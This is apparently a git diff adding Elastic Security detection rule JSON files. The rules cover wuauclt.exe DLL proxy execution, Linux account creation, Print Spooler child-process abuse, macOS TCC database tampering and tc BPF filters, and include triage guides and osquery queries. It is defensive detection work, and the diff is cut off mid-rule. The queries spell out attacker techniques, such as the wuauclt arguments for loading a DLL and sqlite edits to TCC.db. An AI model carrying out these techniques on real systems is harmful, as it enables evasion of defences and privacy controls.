+ { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline 
to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timeline_id": "e70679c2-6cde-4510-9764-4823df18f7db", + "timeline_title": "Comprehensive Process Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_112.json b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_112.json new file mode 100644 index 00000000000..ca2261d7340 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_112.json 
@@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies abuse of the Windows Update Auto Update Client (wuauclt.exe) to load an arbitrary DLL. This behavior is used as a defense evasion technique to blend-in malicious activity with legitimate Windows software.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ImageLoad via Windows Update Auto Update Client", + "note": "## Triage and analysis\n\n### Investigating ImageLoad via Windows Update Auto Update Client\n\nThe Windows Update Auto Update Client (wuauclt.exe) is the component responsible for managing system updates. However, adversaries may abuse this process to load a malicious DLL and execute malicious code while blending into a legitimate system mechanism. \n\nThis rule identifies potential abuse for code execution by monitoring for specific process arguments (\"/RunHandlerComServer\" and \"/UpdateDeploymentProvider\") and common writable paths where the target DLL can be placed (e.g., \"C:\\Users\\*.dll\", \"C:\\ProgramData\\*.dll\", etc.).\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line and identify the DLL location.\n- Examine whether the DLL is signed.\n- Retrieve the DLL and determine if it is malicious:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate the behavior of child processes, such as network connections, registry or file modifications, and any spawned processes.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.pe.original_file_name == \"wuauclt.exe\" or process.name : \"wuauclt.exe\") and\n /* necessary windows update client args to load a dll */\n process.args : \"/RunHandlerComServer\" and process.args : \"/UpdateDeploymentProvider\" and\n /* common paths writeable by a standard user where the target DLL can be placed */\n process.args : (\"C:\\\\Users\\\\*.dll\", \"C:\\\\ProgramData\\\\*.dll\", \"C:\\\\Windows\\\\Temp\\\\*.dll\", \"C:\\\\Windows\\\\Tasks\\\\*.dll\")\n", + "references": [ + "https://dtm.uk/wuauclt/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline 
to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timeline_id": "e70679c2-6cde-4510-9764-4823df18f7db", + "timeline_title": "Comprehensive Process Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_4.json b/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_4.json new file mode 100644 index 00000000000..438524525bc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_4.json 
@@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to create new users. Attackers may add new users to establish persistence on a system.", + "from": "now-9m", + "index": [ + "logs-system.auth-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Linux User Account Creation", + "note": "## Triage and analysis\n\n### Investigating Linux User Account Creation\n\nThe `useradd` and `adduser` commands are used to create new user accounts in Linux-based operating systems.\n\nAttackers may create new accounts (both local and domain) to maintain access to victim systems.\n\nThis rule identifies the usage of `useradd` and `adduser` to create new accounts.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was created succesfully.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Account creation is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "iam where host.os.type == \"linux\" and (event.type == \"user\" and event.type == \"creation\") and\nprocess.name in (\"useradd\", \"adduser\") and user.name != null\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 21, + 
"rule_id": "edfd5ca9-9d6c-44d9-b615-1e56b920219c", + "setup": "## Setup\n\nThis rule requires data coming in from Filebeat.\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete \u201cSetup and Run Filebeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n#### Rule Specific Setup Note\n- This rule requires the \u201cFilebeat System Module\u201d to be enabled.\n- The system module collects and parses logs created by the system logging service of common Unix/Linux based distributions.\n- To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + 
"Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1136", + "name": "Create Account", + "reference": "https://attack.mitre.org/techniques/T1136/", + "subtechnique": [ + { + "id": "T1136.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1136/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "edfd5ca9-9d6c-44d9-b615-1e56b920219c_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_107.json b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_107.json new file mode 100644 index 00000000000..a7a85cab5af --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_107.json 
@@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects unusual Print Spooler service (spoolsv.exe) child processes. This may indicate an attempt to exploit privilege escalation vulnerabilities related to the Printing Service on Windows.", + "false_positives": [ + "Install or update of a legitimate printing driver. Verify the printer driver file metadata such as manufacturer and signature information." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Print Spooler Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"spoolsv.exe\" and process.command_line != null and \n (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\") and\n\n /* exclusions for FP control below */\n not process.name : (\"splwow64.exe\", \"PDFCreator.exe\", \"acrodist.exe\", \"spoolsv.exe\", \"msiexec.exe\", \"route.exe\", \"WerFault.exe\") and\n not process.command_line : \"*\\\\WINDOWS\\\\system32\\\\spool\\\\DRIVERS*\" and\n not (process.name : \"net.exe\" and process.command_line : (\"*stop*\", \"*start*\")) and\n not (process.name : (\"cmd.exe\", \"powershell.exe\") and process.command_line : (\"*.spl*\", \"*\\\\program files*\", \"*route add*\")) and\n not (process.name : \"netsh.exe\" and process.command_line : (\"*add portopening*\", \"*rule name*\")) and\n not (process.name : \"regsvr32.exe\" and process.command_line : \"*PrintConfig.dll*\") and\n not process.executable : (\n \"?:\\\\Program Files (x86)\\\\CutePDF Writer\\\\CPWriter2.exe\",\n \"?:\\\\Program Files (x86)\\\\GPLGS\\\\gswin32c.exe\"\n )\n", + "references": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": 
"^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ee5300a7-7e31-4a72-a258-250abb8b3aa1", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": 
"ee5300a7-7e31-4a72-a258-250abb8b3aa1_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_108.json b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_108.json new file mode 100644 index 00000000000..36b49fd9276 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_108.json 
@@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects unusual Print Spooler service (spoolsv.exe) child processes. This may indicate an attempt to exploit privilege escalation vulnerabilities related to the Printing Service on Windows.", + "false_positives": [ + "Install or update of a legitimate printing driver. Verify the printer driver file metadata such as manufacturer and signature information." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Print Spooler Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"spoolsv.exe\" and process.command_line != null and \n (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\") and\n\n /* exclusions for FP control below */\n not process.name : (\"splwow64.exe\", \"PDFCreator.exe\", \"acrodist.exe\", \"spoolsv.exe\", \"msiexec.exe\", \"route.exe\", \"WerFault.exe\") and\n not process.command_line : \"*\\\\WINDOWS\\\\system32\\\\spool\\\\DRIVERS*\" and\n not (process.name : \"net.exe\" and process.command_line : (\"*stop*\", \"*start*\")) and\n not (process.name : (\"cmd.exe\", \"powershell.exe\") and process.command_line : (\"*.spl*\", \"*\\\\program files*\", \"*route add*\")) and\n not (process.name : \"netsh.exe\" and process.command_line : (\"*add portopening*\", \"*rule name*\")) and\n not (process.name : \"regsvr32.exe\" and process.command_line : \"*PrintConfig.dll*\") and\n not process.executable : (\n \"?:\\\\Program Files (x86)\\\\CutePDF Writer\\\\CPWriter2.exe\",\n \"?:\\\\Program Files (x86)\\\\GPLGS\\\\gswin32c.exe\"\n )\n", + "references": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527" + ], + "related_integrations": [ + { + "package": "endpoint", + 
"version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ee5300a7-7e31-4a72-a258-250abb8b3aa1", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + 
}, + "id": "ee5300a7-7e31-4a72-a258-250abb8b3aa1_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_107.json b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_107.json new file mode 100644 index 00000000000..b1bbd8e9858 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eea82229-b002-470e-a9e1-00be38b14d32_107.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of sqlite3 to directly modify the Transparency, Consent, and Control (TCC) SQLite database. This may indicate an attempt to bypass macOS privacy controls, including access to sensitive resources like the system camera, microphone, address book, and calendar.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privacy Control Bypass via TCCDB Modification", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.name : \"sqlite*\" and\n process.args : \"/*/Application Support/com.apple.TCC/TCC.db\" and\n not process.parent.executable : \"/Library/Bitdefender/AVP/product/bin/*\"\n", + "references": [ + "https://applehelpwriter.com/2016/08/29/discovering-how-dropbox-hacks-your-mac/", + "https://github.com/bp88/JSS-Scripts/blob/master/TCC.db%20Modifier.sh", + "https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "eea82229-b002-470e-a9e1-00be38b14d32", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "eea82229-b002-470e-a9e1-00be38b14d32_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_108.json b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_108.json new file mode 100644 index 00000000000..7f6068a4797 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ef04a476-07ec-48fc-8f3d-5e1742de76d3_108.json 
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when the tc (transmission control) binary is utilized to set a BPF (Berkeley Packet Filter) on a network interface. Tc is used to configure Traffic Control in the Linux kernel. It can shape, schedule, police and drop traffic. A threat actor can utilize tc to set a bpf filter on an interface for the purpose of manipulating the incoming traffic. This technique is not at all common and should indicate abnormal, suspicious or malicious activity.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "BPF filter applied using TC", + "query": "process where host.os.type == \"linux\" and event.type != \"end\" and process.executable == \"/usr/sbin/tc\" and\nprocess.args == \"filter\" and process.args == \"add\" and process.args == \"bpf\" and\nnot process.parent.executable == \"/usr/sbin/libvirtd\"\n", + "references": [ + "https://github.com/h3xduck/TripleCross/blob/master/src/helpers/deployer.sh", + "https://man7.org/linux/man-pages/man8/tc.8.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "ef04a476-07ec-48fc-8f3d-5e1742de76d3", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and 